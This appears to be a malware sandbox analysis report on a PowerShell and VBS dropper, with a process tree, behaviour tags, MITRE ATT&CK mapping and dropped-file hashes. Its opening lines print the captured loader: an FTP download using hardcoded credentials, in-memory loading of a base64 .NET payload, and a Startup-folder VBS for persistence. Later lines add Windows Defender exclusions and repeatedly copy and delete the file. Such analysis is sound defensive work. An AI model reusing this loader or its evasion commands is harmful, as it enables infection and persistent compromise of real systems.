$pasta + '\Upwin.msu');$FoldStartup = ('C:\Users\' + [Environment]::UserName );$file = ($pasta + '\Upwin.msu'); powershell.exe wusa.exe $file /quiet /norestart ; Copy-Item 'C:\Users\Admin\AppData\Local\Temp\f40405b25286ec40c39bfadf2e70ce5d102d4dd5a8309a5c1b7d1c710e1efb73.vbs' -Destination ( $FoldStartup + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup' ) -force ;powershell.exe -command 'sleep 180'; shutdown.exe /r /t 0 /f }else {[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true};[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12;$GAwZn;$CSaXQ = (New-Object Net.WebClient);$CSaXQ.Encoding = [System.Text.Encoding]::UTF8;$CSaXQ.Credentials = new-object System.Net.NetworkCredential('desckvbrat1','developerpro21578Jp@@');$GAwZn = $CSaXQ.DownloadString( 'ftp://[email protected]/Upcrypter/01/DLL01.txt' );$CSaXQ.dispose();$CSaXQ = (New-Object Net.WebClient);$CSaXQ.Encoding = [System.Text.Encoding]::UTF8;$GAwZn = $CSaXQ.DownloadString( $GAwZn );$hzwje = 'C:\Users\Admin\AppData\Local\Temp\f40405b25286ec40c39bfadf2e70ce5d102d4dd5a8309a5c1b7d1c710e1efb73.vbs';[Byte[]] $xXzmx = [System.Convert]::FromBase64String( $GAwZn.Replace( '↓:↓' , 'A' ) );[System.AppDomain]::CurrentDomain.Load( $xXzmx ).GetType('ClassLibrary3.Class1').GetMethod( 'prFVI' ).Invoke( $null , [object[]] ( 'elif/txt.uga/ajac5nltsd9ywkd/elif/moc.erifaidem.www//:sptth' , $hzwje , 'true1' ) );};"
    3⤵
    - Blocklisted process makes network request
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:3760
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell $S = 'C:\Windows\System32\WindowsPowerShell\v1.0' ; Add-MpPreference -ExclusionPath $S -force ;
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:3980
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell $S = 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe' ; Add-MpPreference -ExclusionPath $S -force ;
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:4880
  - - C:\Windows\SYSTEM32\cmd.exe
      cmd.exe /c mkdir "C:\Users\Admin\AppData\Local\Microsoft\LocalLow\System Update\"
      4⤵
      PID:4912
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -ExecutionPolicy Bypass -file "C:\Users\Admin\AppData\Local\Microsoft\LocalLow\System Update\\x2.ps1"
      4⤵
      Command and Scripting Interpreter: PowerShell
      Adds Run key to start application
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:2400
  - - C:\Windows\SYSTEM32\cmd.exe
      cmd.exe /c copy "C:\Users\Admin\AppData\Local\Temp\f40405b25286ec40c39bfadf2e70ce5d102d4dd5a8309a5c1b7d1c710e1efb73.vbs" "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f40405b25286ec40c39bfadf2e70ce5d102d4dd5a8309a5c1b7d1c710e1efb73.vbs"
      4⤵
      Drops startup file
      PID:4032
  - - C:\Windows\SYSTEM32\cmd.exe
      cmd.exe /c del "C:\Users\Admin\AppData\Local\Temp\f40405b25286ec40c39bfadf2e70ce5d102d4dd5a8309a5c1b7d1c710e1efb73.vbs"
      4⤵
      PID:4144
  - - C:\Windows\SYSTEM32\cmd.exe
      cmd.exe /c copy "C:\Users\Admin\AppData\Local\Temp\f40405b25286ec40c39bfadf2e70ce5d102d4dd5a8309a5c1b7d1c710e1efb73.vbs" "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f40405b25286ec40c39bfadf2e70ce5d102d4dd5a8309a5c1b7d1c710e1efb73.vbs"
      4⤵
      PID:2612
  - - C:\Windows\SYSTEM32\cmd.exe
      cmd.exe /c del "C:\Users\Admin\AppData\Local\Temp\f40405b25286ec40c39bfadf2e70ce5d102d4dd5a8309a5c1b7d1c710e1efb73.vbs"
      4⤵
      PID:2344
  - - C:\Windows\SYSTEM32\cmd.exe
      cmd.exe /c copy "C:\Users\Admin\AppData\Local\Temp\f40405b25286ec40c39bfadf2e70ce5d102d4dd5a8309a5c1b7d1c710e1efb73.vbs" "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f40405b25286ec40c39bfadf2e70ce5d102d4dd5a8309a5c1b7d1c710e1efb73.vbs"
      4⤵
      PID:1220
  - - C:\Windows\SYSTEM32\cmd.exe
      cmd.exe /c del "C:\Users\Admin\AppData\Local\Temp\f40405b25286ec40c39bfadf2e70ce5d102d4dd5a8309a5c1b7d1c710e1efb73.vbs"
      4⤵
      PID:1260
  - - C:\Windows\SYSTEM32\cmd.exe
      cmd.exe /c copy "C:\Users\Admin\AppData\Local\Temp\f40405b25286ec40c39bfadf2e70ce5d102d4dd5a8309a5c1b7d1c710e1efb73.vbs" "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f40405b25286ec40c39bfadf2e70ce5d102d4dd5a8309a5c1b7d1c710e1efb73.vbs"
      4⤵
      PID:4420
  - - C:\Windows\SYSTEM32\cmd.exe
      cmd.exe /c del "C:\Users\Admin\AppData\Local\Temp\f40405b25286ec40c39bfadf2e70ce5d102d4dd5a8309a5c1b7d1c710e1efb73.vbs"
      4⤵
      PID:4808
  - - C:\Windows\SYSTEM32\cmd.exe
      cmd.exe /c copy "C:\Users\Admin\AppData\Local\Temp\f40405b25286ec40c39bfadf2e70ce5d102d4dd5a8309a5c1b7d1c710e1efb73.vbs" "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f40405b25286ec40c39bfadf2e70ce5d102d4dd5a8309a5c1b7d1c710e1efb73.vbs"
      4⤵
      PID:3500
  - - C:\Windows\SYSTEM32\cmd.exe
      cmd.exe /c del "C:\Users\Admin\AppData\Local\Temp\f40405b25286ec40c39bfadf2e70ce5d102d4dd5a8309a5c1b7d1c710e1efb73.vbs"
      4⤵
      PID:3796
  - - C:\Windows\SYSTEM32\cmd.exe
      cmd.exe /c copy "C:\Users\Admin\AppData\Local\Temp\f40405b25286ec40c39bfadf2e70ce5d102d4dd5a8309a5c1b7d1c710e1efb73.vbs" "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f40405b25286ec40c39bfadf2e70ce5d102d4dd5a8309a5c1b7d1c710e1efb73.vbs"
      4⤵
      PID:720
  - - C:\Windows\SYSTEM32\cmd.exe
      cmd.exe /c del "C:\Users\Admin\AppData\Local\Temp\f40405b25286ec40c39bfadf2e70ce5d102d4dd5a8309a5c1b7d1c710e1efb73.vbs"
      4⤵
      PID:2976
  - - C:\Windows\SYSTEM32\cmd.exe
      cmd.exe /c copy "C:\Users\Admin\AppData\Local\Temp\f40405b25286ec40c39bfadf2e70ce5d102d4dd5a8309a5c1b7d1c710e1efb73.vbs" "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f40405b25286ec40c39bfadf2e70ce5d102d4dd5a8309a5c1b7d1c710e1efb73.vbs"
      4⤵
      PID:3808
  - - C:\Windows\SYSTEM32\cmd.exe
      cmd.exe /c del "C:\Users\Admin\AppData\Local\Temp\f40405b25286ec40c39bfadf2e70ce5d102d4dd5a8309a5c1b7d1c710e1efb73.vbs"
      4⤵
      PID:1788
  - - C:\Windows\SYSTEM32\cmd.exe
      cmd.exe /c copy "C:\Users\Admin\AppData\Local\Temp\f40405b25286ec40c39bfadf2e70ce5d102d4dd5a8309a5c1b7d1c710e1efb73.vbs" "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f40405b25286ec40c39bfadf2e70ce5d102d4dd5a8309a5c1b7d1c710e1efb73.vbs"
      4⤵
      PID:2112
  - - C:\Windows\SYSTEM32\cmd.exe
      cmd.exe /c del "C:\Users\Admin\AppData\Local\Temp\f40405b25286ec40c39bfadf2e70ce5d102d4dd5a8309a5c1b7d1c710e1efb73.vbs"
      4⤵
      PID:1252
  - - C:\Windows\SYSTEM32\cmd.exe
      cmd.exe /c copy "C:\Users\Admin\AppData\Local\Temp\f40405b25286ec40c39bfadf2e70ce5d102d4dd5a8309a5c1b7d1c710e1efb73.vbs" "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f40405b25286ec40c39bfadf2e70ce5d102d4dd5a8309a5c1b7d1c710e1efb73.vbs"
      4⤵
      PID:1764
  - - C:\Windows\SYSTEM32\cmd.exe
      cmd.exe /c del "C:\Users\Admin\AppData\Local\Temp\f40405b25286ec40c39bfadf2e70ce5d102d4dd5a8309a5c1b7d1c710e1efb73.vbs"
      4⤵
      PID:3176
  - - C:\Windows\SYSTEM32\cmd.exe
      cmd.exe /c copy "C:\Users\Admin\AppData\Local\Temp\f40405b25286ec40c39bfadf2e70ce5d102d4dd5a8309a5c1b7d1c710e1efb73.vbs" "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f40405b25286ec40c39bfadf2e70ce5d102d4dd5a8309a5c1b7d1c710e1efb73.vbs"
      4⤵
      PID:4640
  - - C:\Windows\SYSTEM32\cmd.exe
      cmd.exe /c del "C:\Users\Admin\AppData\Local\Temp\f40405b25286ec40c39bfadf2e70ce5d102d4dd5a8309a5c1b7d1c710e1efb73.vbs"
      4⤵
      PID:2572
  - - C:\Windows\SYSTEM32\cmd.exe
      cmd.exe /c copy "C:\Users\Admin\AppData\Local\Temp\f40405b25286ec40c39bfadf2e70ce5d102d4dd5a8309a5c1b7d1c710e1efb73.vbs" "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f40405b25286ec40c39bfadf2e70ce5d102d4dd5a8309a5c1b7d1c710e1efb73.vbs"
      4⤵
      PID:1972
  - - C:\Windows\SYSTEM32\cmd.exe
      cmd.exe /c del "C:\Users\Admin\AppData\Local\Temp\f40405b25286ec40c39bfadf2e70ce5d102d4dd5a8309a5c1b7d1c710e1efb73.vbs"
      4⤵
      PID:4832
  - - C:\Windows\SYSTEM32\cmd.exe
      cmd.exe /c copy "C:\Users\Admin\AppData\Local\Temp\f40405b25286ec40c39bfadf2e70ce5d102d4dd5a8309a5c1b7d1c710e1efb73.vbs" "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f40405b25286ec40c39bfadf2e70ce5d102d4dd5a8309a5c1b7d1c710e1efb73.vbs"
      4⤵
      PID:3824
  - - C:\Windows\SYSTEM32\cmd.exe
      cmd.exe /c del "C:\Users\Admin\AppData\Local\Temp\f40405b25286ec40c39bfadf2e70ce5d102d4dd5a8309a5c1b7d1c710e1efb73.vbs"
      4⤵
      PID:4312
  - - C:\Windows\SYSTEM32\cmd.exe
      cmd.exe /c copy "C:\Users\Admin\AppData\Local\Temp\f40405b25286ec40c39bfadf2e70ce5d102d4dd5a8309a5c1b7d1c710e1efb73.vbs" "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f40405b25286ec40c39bfadf2e70ce5d102d4dd5a8309a5c1b7d1c710e1efb73.vbs"
      4⤵
      PID:4464
  - - C:\Windows\SYSTEM32\cmd.exe
      cmd.exe /c del "C:\Users\Admin\AppData\Local\Temp\f40405b25286ec40c39bfadf2e70ce5d102d4dd5a8309a5c1b7d1c710e1efb73.vbs"
      4⤵
      PID:3472
  - - C:\Windows\SYSTEM32\cmd.exe
      cmd.exe /c copy "C:\Users\Admin\AppData\Local\Temp\f40405b25286ec40c39bfadf2e70ce5d102d4dd5a8309a5c1b7d1c710e1efb73.vbs" "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f40405b25286ec40c39bfadf2e70ce5d102d4dd5a8309a5c1b7d1c710e1efb73.vbs"
      4⤵
      PID:2096
  - - C:\Windows\SYSTEM32\cmd.exe
      cmd.exe /c del "C:\Users\Admin\AppData\Local\Temp\f40405b25286ec40c39bfadf2e70ce5d102d4dd5a8309a5c1b7d1c710e1efb73.vbs"
      4⤵
      PID:3808
  - - C:\Windows\SYSTEM32\cmd.exe
      cmd.exe /c copy "C:\Users\Admin\AppData\Local\Temp\f40405b25286ec40c39bfadf2e70ce5d102d4dd5a8309a5c1b7d1c710e1efb73.vbs" "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f40405b25286ec40c39bfadf2e70ce5d102d4dd5a8309a5c1b7d1c710e1efb73.vbs"
      4⤵
      PID:2276
  - - C:\Windows\SYSTEM32\cmd.exe
      cmd.exe /c del "C:\Users\Admin\AppData\Local\Temp\f40405b25286ec40c39bfadf2e70ce5d102d4dd5a8309a5c1b7d1c710e1efb73.vbs"
      4⤵
      PID:1576
  - - C:\Windows\SYSTEM32\cmd.exe
      cmd.exe /c copy "C:\Users\Admin\AppData\Local\Temp\f40405b25286ec40c39bfadf2e70ce5d102d4dd5a8309a5c1b7d1c710e1efb73.vbs" "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f40405b25286ec40c39bfadf2e70ce5d102d4dd5a8309a5c1b7d1c710e1efb73.vbs"
      4⤵
      PID:3980
  - - C:\Windows\SYSTEM32\cmd.exe
      cmd.exe /c del "C:\Users\Admin\AppData\Local\Temp\f40405b25286ec40c39bfadf2e70ce5d102d4dd5a8309a5c1b7d1c710e1efb73.vbs"
      4⤵
      PID:5064
  - - C:\Windows\SYSTEM32\cmd.exe
      cmd.exe /c copy "C:\Users\Admin\AppData\Local\Temp\f40405b25286ec40c39bfadf2e70ce5d102d4dd5a8309a5c1b7d1c710e1efb73.vbs" "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f40405b25286ec40c39bfadf2e70ce5d102d4dd5a8309a5c1b7d1c710e1efb73.vbs"
      4⤵
      PID:2592
  - - C:\Windows\SYSTEM32\cmd.exe
      cmd.exe /c del "C:\Users\Admin\AppData\Local\Temp\f40405b25286ec40c39bfadf2e70ce5d102d4dd5a8309a5c1b7d1c710e1efb73.vbs"
      4⤵
      PID:1216
  - - C:\Windows\SYSTEM32\cmd.exe
      cmd.exe /c copy "C:\Users\Admin\AppData\Local\Temp\f40405b25286ec40c39bfadf2e70ce5d102d4dd5a8309a5c1b7d1c710e1efb73.vbs" "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f40405b25286ec40c39bfadf2e70ce5d102d4dd5a8309a5c1b7d1c710e1efb73.vbs"
      4⤵
      PID:4400
  - - C:\Windows\SYSTEM32\cmd.exe
      cmd.exe /c del "C:\Users\Admin\AppData\Local\Temp\f40405b25286ec40c39bfadf2e70ce5d102d4dd5a8309a5c1b7d1c710e1efb73.vbs"
      4⤵
      PID:2204
  - - C:\Windows\SYSTEM32\cmd.exe
      cmd.exe /c copy "C:\Users\Admin\AppData\Local\Temp\f40405b25286ec40c39bfadf2e70ce5d102d4dd5a8309a5c1b7d1c710e1efb73.vbs" "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f40405b25286ec40c39bfadf2e70ce5d102d4dd5a8309a5c1b7d1c710e1efb73.vbs"
      4⤵
      PID:1220
  - - C:\Windows\SYSTEM32\cmd.exe
      cmd.exe /c del "C:\Users\Admin\AppData\Local\Temp\f40405b25286ec40c39bfadf2e70ce5d102d4dd5a8309a5c1b7d1c710e1efb73.vbs"
      4⤵
      PID:4640

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Defense Evasion

Indicator Removal

T1070

File Deletion

T1070.004

Modify Registry

T1112

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
d85ba6ff808d9e5444a4b369f5bc2730

SHA1
31aa9d96590fff6981b315e0b391b575e4c0804a

SHA256
84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

SHA512
8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\LocalLow\System Update\x2.ps1

Filesize
336B

MD5
d116c9f2be7da28931189c927d266bf9

SHA1
3e6340c802c3a46d044972769286669343105831

SHA256
31dd42db41c8782465a19c9099103480bee01dbfa5f58108354d2ae765d36598

SHA512
44f6c5c350723b7c740fdf97e295cce7db66d051d5130bbd64fdffe50d3dbb5cef1120d42c33135020ac364dea73132356516dfdeb41f6f04f3d6c57056d5bd6

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\LocalLow\System Update\x2.txt

Filesize
355B

MD5
daa58b938ebe73e880b2cdd8704c6301

SHA1
857c5eaf94dfeb56ba44ac70685c6787a846549c

SHA256
50bae474c92c50383c3e65183eed42e3c05d134b0baf0f5cf6f8095f362f5ee6

SHA512
53d127cf5afe697a77b9ff1658673295be80fbbcc24e8fa5b28d39ce7dd158ddfe1d7e756f189280fb965881a6ff1764ddb0e74325eb24574b1cb466039e999e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
77d622bb1a5b250869a3238b9bc1402b

SHA1
d47f4003c2554b9dfc4c16f22460b331886b191b

SHA256
f97ff12a8abf4bf88bb6497bd2ac2da12628c8847a8ba5a9026bdbb76507cdfb

SHA512
d6789b5499f23c9035375a102271e17a8a82e57d6f5312fa24242e08a83efdeb8becb7622f55c4cf1b89c7d864b445df11f4d994cf7e2f87a900535bcca12fd9

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_rnk0oad0.0kr.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
memory/3760-23-0x0000022821A80000-0x0000022821A8A000-memory.dmp

Filesize
40KB

Download
memory/4136-0-0x00007FF819F83000-0x00007FF819F85000-memory.dmp

Filesize
8KB

Download
memory/4136-1-0x000001EDF4C30000-0x000001EDF4C52000-memory.dmp

Filesize
136KB

Download
memory/4136-11-0x00007FF819F80000-0x00007FF81AA41000-memory.dmp

Filesize
10.8MB

Download
memory/4136-12-0x00007FF819F80000-0x00007FF81AA41000-memory.dmp

Filesize
10.8MB

Download
memory/4136-22-0x00007FF819F80000-0x00007FF81AA41000-memory.dmp

Filesize
10.8MB

Download